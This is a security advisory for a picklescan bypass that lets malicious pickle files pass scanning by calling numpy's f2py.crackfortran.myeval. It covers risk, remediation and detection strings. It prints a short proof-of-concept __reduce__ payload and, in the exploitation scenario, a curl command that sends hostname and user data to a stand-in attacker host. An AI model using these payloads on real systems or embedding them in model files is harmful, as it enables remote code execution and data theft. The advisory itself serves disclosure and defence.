GHSA-3329-ghmp-jmv5: picklescan: Code Injection enables RCE

GHSA-3329-ghmp-jmv5 HIGH
Published December 29, 2025
CISO Take

Picklescan, the de facto ML model safety scanner, can be bypassed by crafting pickle payloads that invoke numpy's internal `f2py.crackfortran.myeval` function; any model your team cleared with picklescan < 0.0.33 must be considered untrusted and re-scanned. Patch to 0.0.33 immediately, re-validate all previously approved artifacts, and treat picklescan-passed models as unverified until confirmed on the patched version. False assurance is worse than no scanner: teams following security best practices are the specific targets here.

Risk Assessment

HIGH. Exploitability is trivial — the PoC is four lines of Python requiring no special access or ML expertise. Impact is critical: arbitrary code execution on any system that loads a pickle file after it passes picklescan validation. The attack's most dangerous property is the false sense of security it creates: organizations that implemented picklescan as their security gate are now more exposed than those with no scanner, because they will load attacker-controlled artifacts with confidence. Broad exposure across MLOps pipelines, model marketplaces, and CI/CD automation that auto-validates contributed models.

Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
| --- | --- | --- | --- |
| picklescan | pip | < 0.0.33 | 0.0.33 |


Severity & Risk

- CVSS 3.1: N/A
- EPSS: N/A
- Exploitation Status: No known exploitation
- Sophistication: Moderate

Recommended Action

  1. PATCH NOW

    Upgrade picklescan to >= 0.0.33 across all environments. Pin the version in requirements files.
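The pin from step 1 can be expressed directly in a requirements file (a minimal sketch; combine with a lockfile or hash-pinning if your pipeline supports it):

```
picklescan>=0.0.33
```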

  2. RE-SCAN ALL ARTIFACTS

    Any model or pickle file validated by a vulnerable picklescan version must be re-scanned with the patched version before reuse. Do not grandfather existing approvals.

  3. SWITCH FORMATS WHERE POSSIBLE

    Migrate PyTorch model storage to safetensors format, which eliminates pickle deserialization risk entirely.

  4. SANDBOX MODEL LOADING

    Even with patched picklescan, load untrusted models in isolated environments with no network access and restricted syscalls (seccomp, gVisor).

  5. DETECTION

    Search repos and artifact stores for pickle files containing 'crackfortran' or 'myeval' strings. Audit CI/CD pipelines for picklescan version constraints and add dependency pinning.
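The sweep in step 5 needs only the standard library, because a myeval-based payload has to name the import path as plain bytes inside the pickle stream. A minimal sketch (the extension list is an assumption; adjust it for your artifact store):

```python
import pathlib

# Byte patterns a myeval-based payload must carry: pickle stores the
# imported module/attribute path as plain bytes in the stream.
INDICATORS = (b"crackfortran", b"myeval")

# Extensions commonly used for pickled artifacts (assumption; extend as needed).
SUSPECT_EXTS = {".pkl", ".pickle", ".pt", ".pth", ".bin", ".ckpt"}

def find_suspect_pickles(root):
    """Yield files under `root` whose raw bytes contain an indicator string."""
    for path in sorted(pathlib.Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SUSPECT_EXTS:
            if any(marker in path.read_bytes() for marker in INDICATORS):
                yield path
```

For multi-gigabyte weight files, replace `read_bytes()` with chunked reads; and treat a hit as a trigger for re-scanning with patched picklescan, not as proof of compromise, since the strings can appear in benign contexts.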

  6. DEFENSE IN DEPTH

    Never rely solely on a single scanner — combine picklescan with hash verification against trusted sources and provenance attestation.
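The hash-verification half of step 6 also needs only the standard library; how the expected digest reaches you (signed manifest, registry metadata) is an assumption left to your pipeline:

```python
import hashlib
import hmac

def sha256_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so multi-GB weights never sit in RAM."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        while chunk := fh.read(chunk_size):
            digest.update(chunk)
    return digest.hexdigest()

def verify_artifact(path, expected_hex):
    """Compare against a digest obtained out-of-band, e.g. from a signed manifest."""
    actual = sha256_file(path)
    if not hmac.compare_digest(actual, expected_hex):
        raise ValueError(f"hash mismatch for {path}: got {actual}")
    return True
```

Run verification before the artifact ever reaches `pickle.load()` or `torch.load()`, so a swapped file fails closed.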

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
- Article 9 - Risk management system
- Article 17 - Quality management system

ISO 42001
- A.6.1.6 - AI system supply chain security controls
- A.6.2.5 - AI supply chain management
- A.8.1 - AI system operational monitoring

NIST AI RMF
- MANAGE 2.2 - Risk response and treatment
- MAP 5.1 - Likelihood of AI risks
- MEASURE 2.5 - AI system security and resilience testing

OWASP LLM Top 10
- LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-3329-ghmp-jmv5?

GHSA-3329-ghmp-jmv5 is a code-injection vulnerability in picklescan, the de facto ML model safety scanner. Crafted pickle payloads that invoke numpy's internal `f2py.crackfortran.myeval` pass the scanner undetected, so any model cleared with picklescan < 0.0.33 must be considered untrusted and re-scanned. Patch to 0.0.33 immediately, re-validate all previously approved artifacts, and treat picklescan-passed models as unverified until confirmed on the patched version.

Is GHSA-3329-ghmp-jmv5 actively exploited?

No confirmed active exploitation of GHSA-3329-ghmp-jmv5 has been reported, but organizations should still patch proactively.

How to fix GHSA-3329-ghmp-jmv5?

1. PATCH NOW: Upgrade picklescan to >= 0.0.33 across all environments. Pin the version in requirements files.
2. RE-SCAN ALL ARTIFACTS: Any model or pickle file validated by a vulnerable picklescan version must be re-scanned with the patched version before reuse. Do not grandfather existing approvals.
3. SWITCH FORMATS WHERE POSSIBLE: Migrate PyTorch model storage to safetensors format, which eliminates pickle deserialization risk entirely.
4. SANDBOX MODEL LOADING: Even with patched picklescan, load untrusted models in isolated environments with no network access and restricted syscalls (seccomp, gVisor).
5. DETECTION: Search repos and artifact stores for pickle files containing 'crackfortran' or 'myeval' strings. Audit CI/CD pipelines for picklescan version constraints and add dependency pinning.
6. DEFENSE IN DEPTH: Never rely solely on a single scanner; combine picklescan with hash verification against trusted sources and provenance attestation.

What systems are affected by GHSA-3329-ghmp-jmv5?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model registries, data science notebooks.

What is the CVSS score for GHSA-3329-ghmp-jmv5?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary

Picklescan fails to flag `numpy.f2py.crackfortran.myeval`, a numpy-internal helper that evaluates a string as Python code, allowing malicious pickle files to pass scanning and execute code when loaded.

### Details

The attack executes in the following steps:

- First, the attacker crafts the payload by returning the `numpy.f2py.crackfortran.myeval` function from the object's `__reduce__` method.
- Then, the victim checks whether the pickle file is safe using the picklescan library. The library does not detect any dangerous functions, so the victim calls `pickle.load()` on the malicious pickle file, leading to remote code execution.

### PoC

```
class RCE:
    def __reduce__(self):
        from numpy.f2py.crackfortran import myeval
        return (myeval, ("os.system('ls')",))
```

### Impact

Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models is affected. Attackers can embed malicious code in a pickle file that remains undetected but executes when the file is loaded, and can distribute infected pickle files across ML models, APIs, or saved Python objects.

### Credit

Reported by Pinji Chen (cpj24@mails.tsinghua.edu.cn) from the NISL lab (https://netsec.ccert.edu.cn/about) at Tsinghua University, and Guanheng Liu (coolwind326@gmail.com).
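The bypass works because `__reduce__` lets a pickle stream name any importable callable for the deserializer to invoke; a scanner must blocklist every such callable that can reach eval/exec/system, and `myeval` was missed. A self-contained illustration of the mechanics, using a benign stdlib function (`os.path.basename`) as a stand-in for `myeval`:

```python
import pickle

class ReduceDemo:
    # __reduce__ tells pickle: "to rebuild me, import this function and
    # call it with these arguments". Nothing restricts it to constructors.
    def __reduce__(self):
        from os.path import basename  # benign stand-in for f2py.crackfortran.myeval
        return (basename, ("/tmp/payload.bin",))

blob = pickle.dumps(ReduceDemo())
# Deserialization *calls* basename("/tmp/payload.bin") and returns its result;
# with myeval, the string argument would instead be evaluated as Python code.
result = pickle.loads(blob)
print(result)  # -> payload.bin
```

This is why scanning pickles by blocklist is inherently fragile: the dangerous surface is every importable callable in the victim's environment, not a fixed set of known-bad names.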

Exploitation Scenario

Attacker publishes a PyTorch model to a public model hub or sends it directly to an ML engineering team via a convincing pull request or vendor submission. The model's pickle payload uses `numpy.f2py.crackfortran.myeval` in its `__reduce__` method to execute `os.system('curl -s http://attacker.com/$(hostname)/$(whoami)')`. The ML team runs picklescan as their standard validation step — it returns clean with no dangerous globals detected. Confident the model is safe, they load it in their training pipeline via `torch.load()`. On deserialization, the payload executes in the context of the training server: the attacker achieves RCE, potentially exfiltrating AWS credentials from instance metadata, model weights, proprietary training data, or establishing a reverse shell into the MLOps environment.

Timeline

Published
December 29, 2025
Last Modified
December 29, 2025
First Seen
March 24, 2026
